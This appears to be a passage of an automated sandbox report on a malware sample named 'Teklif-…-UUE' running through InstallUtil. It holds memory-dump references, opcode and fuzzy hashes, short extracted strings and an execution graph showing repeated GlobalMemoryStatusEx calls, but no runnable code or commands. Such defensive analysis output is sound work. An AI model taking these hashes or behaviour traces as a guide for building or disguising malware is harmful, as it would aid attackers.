                                                          • Opcode ID: 3f71b83dbb49bd6465d9477151f13ab699be63c0b3dc8553474f6b8b63ba5678
                                                          • Instruction ID: 00eccce95dfc4d67449d58d5474fa333610646809be32351c022f891c1ada654
                                                          • Opcode Fuzzy Hash: 3f71b83dbb49bd6465d9477151f13ab699be63c0b3dc8553474f6b8b63ba5678
                                                          • Instruction Fuzzy Hash: 21812A78D05208CFDB04DFA8D444BEEBBFAFB49304F24946AE409AB295DB749959CF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c367947b93d4f73e134f1c08badab3933331bcd7a48653dbfc0502dc763cb1f2
                                                          • Instruction ID: 9595d83bcbb8e5a2a38d2581887e620c5f00c3b2d4701667547c180dc1357799
                                                          • Opcode Fuzzy Hash: c367947b93d4f73e134f1c08badab3933331bcd7a48653dbfc0502dc763cb1f2
                                                          • Instruction Fuzzy Hash: 53814A74E04208CFDB14DF68D494BADBBF6FB4A304F2490AAE409EB255DB749989CF05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 273754886f503b885c023c3bf332e011dcc17b2853e892ab7feaa8a28489a0cc
                                                          • Instruction ID: dc02e23e06d57b715f5e67d9dd44e5bfe46994f509869385ec403231053128c0
                                                          • Opcode Fuzzy Hash: 273754886f503b885c023c3bf332e011dcc17b2853e892ab7feaa8a28489a0cc
                                                          • Instruction Fuzzy Hash: 4E811A74E04318CFDB24EF66D844BADBBB6FF49318F1098A9D40AA7290DB745985CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f071c3b385da2c395737e05e9335a82f9823b6ea5142901b1b1a78f2b089e940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$(o]q$(o]q$(o]q$*$-$2$\s]q
                                                          • API String ID: 0-2751159437
                                                          • Opcode ID: 3111656a76191850a9e9b864dbffa63fa298b0a4e5bb4650cbb19b903a7ec0ab
                                                          • Instruction ID: e3f98012525a040f7d4ad08242f417c02fb3162933c93581c0ac96b387febae6
                                                          • Opcode Fuzzy Hash: 3111656a76191850a9e9b864dbffa63fa298b0a4e5bb4650cbb19b903a7ec0ab
                                                          • Instruction Fuzzy Hash: F561E374D0422CCFDB65DF69C848BAEBBF2BF49305F1089AAD40AA7254DB705A84CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                          • API String ID: 0-463314800
                                                          • Opcode ID: ec89f0f07a52d5e1231c7a25b58ae7a60acacea77601ea687f6eec49c1d80ef1
                                                          • Instruction ID: cc5a6c039d45eba6d91ce925c7f7318d18a631c1a8088917fb8904d71eab5f4e
                                                          • Opcode Fuzzy Hash: ec89f0f07a52d5e1231c7a25b58ae7a60acacea77601ea687f6eec49c1d80ef1
                                                          • Instruction Fuzzy Hash: 4F518570A402058FD758DF69995076FBAEBFFC8300F148928D44597399DF78AD06C7A1

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:27
                                                          Total number of Limit Nodes:6
                                                          execution_graph 28564 2420848 28566 242084e 28564->28566 28565 242091b 28566->28565 28569 2421452 28566->28569 28575 2421340 28566->28575 28571 2421356 28569->28571 28572 242145b 28569->28572 28570 2421448 28570->28566 28571->28570 28574 2421452 4 API calls 28571->28574 28581 2427059 28571->28581 28572->28566 28574->28571 28576 2421308 28575->28576 28578 242134b 28575->28578 28576->28566 28577 2421448 28577->28566 28578->28577 28579 2427059 4 API calls 28578->28579 28580 2421452 4 API calls 28578->28580 28579->28578 28580->28578 28583 2427063 28581->28583 28582 2427119 28582->28571 28583->28582 28586 5c0ce88 28583->28586 28591 5c0ce78 28583->28591 28587 5c0ce9d 28586->28587 28588 5c0d0b2 28587->28588 28589 5c0d4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28587->28589 28590 5c0d4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28587->28590 28588->28582 28589->28587 28590->28587 28592 5c0ce88 28591->28592 28593 5c0d0b2 28592->28593 28594 5c0d4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28592->28594 28595 5c0d4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28592->28595 28593->28582 28594->28592 28595->28592

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \V_l
                                                          • API String ID: 0-2978566636
                                                          • Opcode ID: 5ca3853370ceb9e55861ba7e28ee5cd479253bacac7ea5bb9bec0f8c4ab89a6a
                                                          • Instruction ID: ae9c2e1856a8ffb987ed7e690016613dda21c913fbfec8a5e65104b142fce875
                                                          • Opcode Fuzzy Hash: 5ca3853370ceb9e55861ba7e28ee5cd479253bacac7ea5bb9bec0f8c4ab89a6a
                                                          • Instruction Fuzzy Hash: 4A915F70E002199FDF14CFAAC98579EBBF2EF88308F54812AE415A7354EB749889CF45

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q$LR]q
                                                          • API String ID: 0-3917262905
                                                          • Opcode ID: 450a69cea54f937ee0d1dc77aa2e2d9cca779d14693ff58cfda1ffa2642b5bd8
                                                          • Instruction ID: 281d4855836474fadb77691500e5144e60672b64e3edae9bfb9fd22c4810e5a5
                                                          • Opcode Fuzzy Hash: 450a69cea54f937ee0d1dc77aa2e2d9cca779d14693ff58cfda1ffa2642b5bd8
                                                          • Instruction Fuzzy Hash: BB51B370E002199FDF25DF6AC4507AEBBB6EF85300F52846AE406EB341EB759C4ACB41

                                                          Control-flow Graph (graph data omitted; the function includes a call to GlobalMemoryStatusEx)
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2458107054.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5c00000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bafde23f56d8f07d6d1bc87ef93516e98564a137b781621077ffe72bf21c97f
                                                          • Instruction ID: 732d98d3e8299e1d693a6039ea976aa1022041ebfe8c5f662a101caec26abe3d
                                                          • Opcode Fuzzy Hash: 4bafde23f56d8f07d6d1bc87ef93516e98564a137b781621077ffe72bf21c97f
                                                          • Instruction Fuzzy Hash: 53412272E003598FCB00DFA9D8443AEBBF5AF89310F15892AD409AB381DB749981CBD0

                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05C0E0F2), ref: 05C0E1DF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2458107054.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5c00000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: fdb41c8ccff97d3ce4fb35a2900387feb1f4f0a2e5dedfedbdd91ea08a1d28f8
                                                          • Instruction ID: 98bd716b6376423c4850c37edab88225ae3c1aab73de40a0afeee3fd3b77b256
                                                          • Opcode Fuzzy Hash: fdb41c8ccff97d3ce4fb35a2900387feb1f4f0a2e5dedfedbdd91ea08a1d28f8
                                                          • Instruction Fuzzy Hash: C21103B1D006599BCB10DF9AC4446AEFBF8EF48310F14856AE818A7241D778AA44CFE5

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \V_l
                                                          • API String ID: 0-2978566636
                                                          • Opcode ID: 67cd4d6f9aa120443ae917e9002a6a73c62edfe02df49ec347e6316dffdab8d6
                                                          • Instruction ID: fb750fad62af220c85bb31fd1c758d0e26dc94e4c0ecad83c77d3ca6c801ce49
                                                          • Opcode Fuzzy Hash: 67cd4d6f9aa120443ae917e9002a6a73c62edfe02df49ec347e6316dffdab8d6
                                                          • Instruction Fuzzy Hash: 9E914D70E00229DFDB10CFAAD98579EBBF1EF48308F54812AE419A7394DB749889CF55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: c5a6ac52bff65ec4d544c9aa29baa44d2a90e073173a1e1f5c5cbb40d1293599
                                                          • Instruction ID: c7084d480e97565080146c088e557951c856460d7e34e6e03a8c81d67cb8c55f
                                                          • Opcode Fuzzy Hash: c5a6ac52bff65ec4d544c9aa29baa44d2a90e073173a1e1f5c5cbb40d1293599
                                                          • Instruction Fuzzy Hash: 0231D130B002158FDB29AF74D95066E3BF6AF89204F944579D006DB356DF78CD8AC790
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 62736ec88c0a5b8879284addd631a3d0ca093da0d7bc21f30b1734e211f42f8b
                                                          • Instruction ID: cc2bd64658d45b2a3d4d7f0156e032af9a7eca6262492b389684d8ebe066dcd5
                                                          • Opcode Fuzzy Hash: 62736ec88c0a5b8879284addd631a3d0ca093da0d7bc21f30b1734e211f42f8b
                                                          • Instruction Fuzzy Hash: C731DC30B002158FDB28AF34D65066F3ABAAF85200FA44479D406DB39ADF74DD4ACB95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q
                                                          • API String ID: 0-3081347316
                                                          • Opcode ID: 9a1d02beb2c899637b1a2934f21242c6f78f64682dc3c788c25fe141825e8dc1
                                                          • Instruction ID: b04491f707a174f6cedbf9ef4e9f211476c55123b8b3d1f60861490a65d63fa6
                                                          • Opcode Fuzzy Hash: 9a1d02beb2c899637b1a2934f21242c6f78f64682dc3c788c25fe141825e8dc1
                                                          • Instruction Fuzzy Hash: AD316F71E102298BEF25CFA6C45079EB7B5FF85314F62852AE406EB340D7B5D84ACB41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR]q
                                                          • API String ID: 0-3081347316
                                                          • Opcode ID: fd4bee07878f2145958f8624f0502522bffba4fb70503904a946aad07f3fe4d5
                                                          • Instruction ID: 4fe5cd466df18b8f7aa0f780eb223689de82192ca6ade52fcf7881f34cb3c298
                                                          • Opcode Fuzzy Hash: fd4bee07878f2145958f8624f0502522bffba4fb70503904a946aad07f3fe4d5
                                                          • Instruction Fuzzy Hash: B02126726042604FC715AB3DE4657EE3BA5DFC5304F4544ABC145CB296EA29C84EC791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 6be706839645dc0e2fcd5026263cfaa435660c5af9422e70cf1e621629f79ace
                                                          • Instruction ID: a8392b3cb410d385d326a9804f3698656bcf8cc1920cccbf680307a9f48172c1
                                                          • Opcode Fuzzy Hash: 6be706839645dc0e2fcd5026263cfaa435660c5af9422e70cf1e621629f79ace
                                                          • Instruction Fuzzy Hash: F821B835E006199BDB04CFA5C454ADEBBB1AF85310F60C91AEC15BB340DB709947CB51
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d91397746dfb90ee48311b8966bd657a6ee507b8036842022cb3eee4eb95be3
                                                          • Instruction ID: 2f154fee71918a690279b13845edebe6f0eb47fa426b494f9864ee4b76690ebb
                                                          • Opcode Fuzzy Hash: 7d91397746dfb90ee48311b8966bd657a6ee507b8036842022cb3eee4eb95be3
                                                          • Instruction Fuzzy Hash: 2A4102B0D002499FDB10DF99C480ADEBFF5FF48314F60802AE809AB210DB759949CF90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3f6e86ad01a2afdfe9d1e447d793a1a3a69da452ea2a5b1c05f3c8cbaea1b7e
                                                          • Instruction ID: ab8a16dae0d6359ad2f7061154b23692fb91573fb5d7b3f1d9476d96a5c26d84
                                                          • Opcode Fuzzy Hash: b3f6e86ad01a2afdfe9d1e447d793a1a3a69da452ea2a5b1c05f3c8cbaea1b7e
                                                          • Instruction Fuzzy Hash: 9A31A075B00224CFDF14EB36D950AAE77F2EB49204F50046AD50EEB3A1DB318D4ACBA5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 445d9cf7a1f0410c0f1848a121b91897a1c8e7763943ea4ee88773554c41de4b
                                                          • Instruction ID: 0f705060cf420da96c6c50c98157db6a3d47e91e84d7a11378ef2a093c32586f
                                                          • Opcode Fuzzy Hash: 445d9cf7a1f0410c0f1848a121b91897a1c8e7763943ea4ee88773554c41de4b
                                                          • Instruction Fuzzy Hash: 8321B774A402108FFF396729F684B2A3756EB81315F400D26E00EC7366E769984FCB91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70c169e16182dcb03acc99418dfe5c366d30de7e0333e57e52b63d26760ee7fa
                                                          • Instruction ID: 4fff9b979c7233fd96dc7eb172331e03597e45143c9bdffa41d2f8611e542993
                                                          • Opcode Fuzzy Hash: 70c169e16182dcb03acc99418dfe5c366d30de7e0333e57e52b63d26760ee7fa
                                                          • Instruction Fuzzy Hash: 0F31A574A011504FEB26AB25E889F7E3769EB85304F544966D00ECB27BEB28C94FCB51
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc1847828a5d36c01625c8477b316b6759cd7186208d50d588941e28cddafb54
                                                          • Instruction ID: 6a0e3393a5486b06e6274d96cf423b560dfb785d4b2705af5d6587b23e46e308
                                                          • Opcode Fuzzy Hash: bc1847828a5d36c01625c8477b316b6759cd7186208d50d588941e28cddafb54
                                                          • Instruction Fuzzy Hash: 0331B171E102168BDB15CF65D5907DEB7B2EF89300F64C52AE405EB390DBB0988ACB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65f362c6224a975dad4452c055553d8793a75607566266a1b8a685d2f26a23bd
                                                          • Instruction ID: a3e9a2da73c8a786793bd19b066b086b0596715332906e190eb3e05d64a24d3f
                                                          • Opcode Fuzzy Hash: 65f362c6224a975dad4452c055553d8793a75607566266a1b8a685d2f26a23bd
                                                          • Instruction Fuzzy Hash: 6D212C797002148FDB09EB74E454A2D37AAEF88704F208868D40ADB3A9DE359C4BCB91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e307bec4a125042653e9e939c88830a8cbd0e64a469fa613c0103dc3823e554
                                                          • Instruction ID: 85794029c7916bd6a1e00f6fca409d1f4017f6bfea4d9b279f2d27edc4ed1338
                                                          • Opcode Fuzzy Hash: 6e307bec4a125042653e9e939c88830a8cbd0e64a469fa613c0103dc3823e554
                                                          • Instruction Fuzzy Hash: 082104BAF012109FDF10AB79E844B6E37A6EBC8650F104836E50DC3355EB34C90B8B91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22d7c4f271d626e8de025dcb81fe5104a9d31c08eaee75c7c6653c01f57f7757
                                                          • Instruction ID: 49d2049c2e07c68f4d9bb966507f139ea7ae558a390c105a365aa2ec85e4100f
                                                          • Opcode Fuzzy Hash: 22d7c4f271d626e8de025dcb81fe5104a9d31c08eaee75c7c6653c01f57f7757
                                                          • Instruction Fuzzy Hash: B6218231E0021A9BDB15CF65D59069EF7B2FF89300F64C52AE805EB390DBB1984ACB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2445846791.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_a4d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69a1a1b3e3495838f8684666ccfec61dfa80b9c8558a1f17181e4f9e7d686331
                                                          • Instruction ID: 3ea531b419a07eb80389c3f36f2e37f377fb8d824fe6a664ce1dacb75fa7e7c5
                                                          • Opcode Fuzzy Hash: 69a1a1b3e3495838f8684666ccfec61dfa80b9c8558a1f17181e4f9e7d686331
                                                          • Instruction Fuzzy Hash: 742100B9500204EFCB05DF14D9C0B26BF65FBD8320F20C5A9E9090B256C33AE856DAA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f32622a65c0bd4977f27a8e4cc8a18bd111de58df4e8da175f81e430c6f7c8b
                                                          • Instruction ID: e78cf26081111aa4e47706dd84902e8138fd79322b3a0b7991f511f35ab1c540
                                                          • Opcode Fuzzy Hash: 9f32622a65c0bd4977f27a8e4cc8a18bd111de58df4e8da175f81e430c6f7c8b
                                                          • Instruction Fuzzy Hash: 71219371A002249FCF21EBBA85407AE77E5EB48214F94047BD90DDB341E735C84ACB91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446023439.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d3d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e152e42e4ed0968c2362e1bdaaa42150686deca2abcd1e54d085cb893fba8513
                                                          • Instruction ID: 5ed2874b9474940f787744cb57d01d78320d9dea9de23df6333920f7e75e9d66
                                                          • Opcode Fuzzy Hash: e152e42e4ed0968c2362e1bdaaa42150686deca2abcd1e54d085cb893fba8513
                                                          • Instruction Fuzzy Hash: 1721F271604204DFCB18DF24E9C4B26BF66FB88714F24C569E94A4B296C33AD807CE71
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dcad1345b0f045137c5ab48e9466ade33821cad4ab4b58a870be333f14d8efa
                                                          • Instruction ID: a367b546e876ed8c2dfdc9716c940c9ed2d1b773dc969b8c35cd4487f59cbb86
                                                          • Opcode Fuzzy Hash: 5dcad1345b0f045137c5ab48e9466ade33821cad4ab4b58a870be333f14d8efa
                                                          • Instruction Fuzzy Hash: 8F21A734E00619DBDB18CFA6C454A9EF7B2BF89300F60891BE815FB340DB709846CB51
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 914a233fcb80215f64c845aac42bd1a1d6bf26281b359c0a9881081e3b1d382e
                                                          • Instruction ID: 4b7b0da25fe1f6cdef5335a01bea7d80c20616195bd90c1f29749b6d97d0a026
                                                          • Opcode Fuzzy Hash: 914a233fcb80215f64c845aac42bd1a1d6bf26281b359c0a9881081e3b1d382e
                                                          • Instruction Fuzzy Hash: 0C215E70B00214CFDB18EB76C5547AE77F6AF49204F600469D10AEB3A1DB359D49CB95
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 298349e10b3142269a8de57688303d90626afa36c014dbcea45dc1cee2ffe0c3
                                                          • Instruction ID: 3a4db83e0c7246893aa6cc42b4e7531e6cd5808c5c58e93fa5db7b9ece58357d
                                                          • Opcode Fuzzy Hash: 298349e10b3142269a8de57688303d90626afa36c014dbcea45dc1cee2ffe0c3
                                                          • Instruction Fuzzy Hash: 172162386011114FEB26AB65E884F2E375AEBC5314F504965D00DCB27AEB24D84ECB91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c14ff6f46a954e88e3a79517b64157485618d43ec868a84dae3cf35b1976c664
                                                          • Instruction ID: b73546afff0e87760284d51495d6622d313aadad29f4f17a1dc808e6c0b6536c
                                                          • Opcode Fuzzy Hash: c14ff6f46a954e88e3a79517b64157485618d43ec868a84dae3cf35b1976c664
                                                          • Instruction Fuzzy Hash: 9911C130B002288FEF64AA7AD44472F77D5EF95310F90593BE006CB3A4DB24C88A8BC0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446023439.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d3d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bff09bda50d191184aa840dc5c6be3334addee28a4a0b510cdb36aea909334ba
                                                          • Instruction ID: 1f0059ee9cfc4b85e5b2bd3c43e7c29f25b11dc3eced6409059fdc957471fe92
                                                          • Opcode Fuzzy Hash: bff09bda50d191184aa840dc5c6be3334addee28a4a0b510cdb36aea909334ba
                                                          • Instruction Fuzzy Hash: BC2192755093C08FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56664609b4d4c5b8a87efad21b7c0d32519f95a2416d18f2c370ec66ad154fbc
                                                          • Instruction ID: 4f7fa5c89185a63ceece43b909bfae9ee1b5aaa9f74c2eeecae4664dfbf36223
                                                          • Opcode Fuzzy Hash: 56664609b4d4c5b8a87efad21b7c0d32519f95a2416d18f2c370ec66ad154fbc
                                                          • Instruction Fuzzy Hash: 4211E030B003288FEF245A76E84472F76C5EBA1210F90593BE002DB391EB64C88D8BC1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2445846791.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_a4d000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                          • Instruction ID: 11cce41c67d0b800f15bf44714eda6029e9c0736bea71710504e4f2e9d0390d1
